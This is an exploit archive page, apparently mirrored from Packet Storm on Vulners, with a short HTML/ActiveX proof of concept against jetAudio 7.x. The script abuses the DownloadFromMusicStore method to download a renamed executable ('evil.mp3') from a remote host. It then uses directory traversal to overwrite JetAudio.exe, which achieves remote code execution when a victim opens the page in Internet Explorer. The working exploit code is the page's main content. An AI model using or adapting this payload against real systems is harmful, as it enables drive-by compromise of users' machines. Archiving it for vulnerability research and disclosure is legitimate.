Lucene search
K

jetaudio-exec.txt

🗓️ 20 Sep 2007 00:00:00Reported by Krystian KloskowskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

jetAudio 7.x ActiveX DownloadFromMusicStore 0day Remote Code Execution Exploi

Code
`<HTML>  
<!--  
jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit  
Bug discovered by Krystian Kloskowski (h07) <[email protected]>  
Tested on:..  
- jetAudio 7.0.3 Basic  
- Microsoft Internet Explorer 6  
Just for fun ;)   
-->  
  
<object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object>  
  
<script>  
var target = "DownloadFromMusicStore";  
//>rename evil.exe evil.mp3  
var url = "http://192.168.0.1/evil.mp3";  
var dst = "..\\..\\..\\..\\..\\..\\..\\..\\Program Files\\JetAudio\\JetAudio.exe";  
var title = "0day";  
var artist = "h07";  
var album = "for fun";  
var genere = "exploit";  
var size = 256;  
var param1 = 0;  
var param2 = 0;  
obj[target](url, dst, title, artist, album, genere, size, param1, param2);  
</script>  
</HTML>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation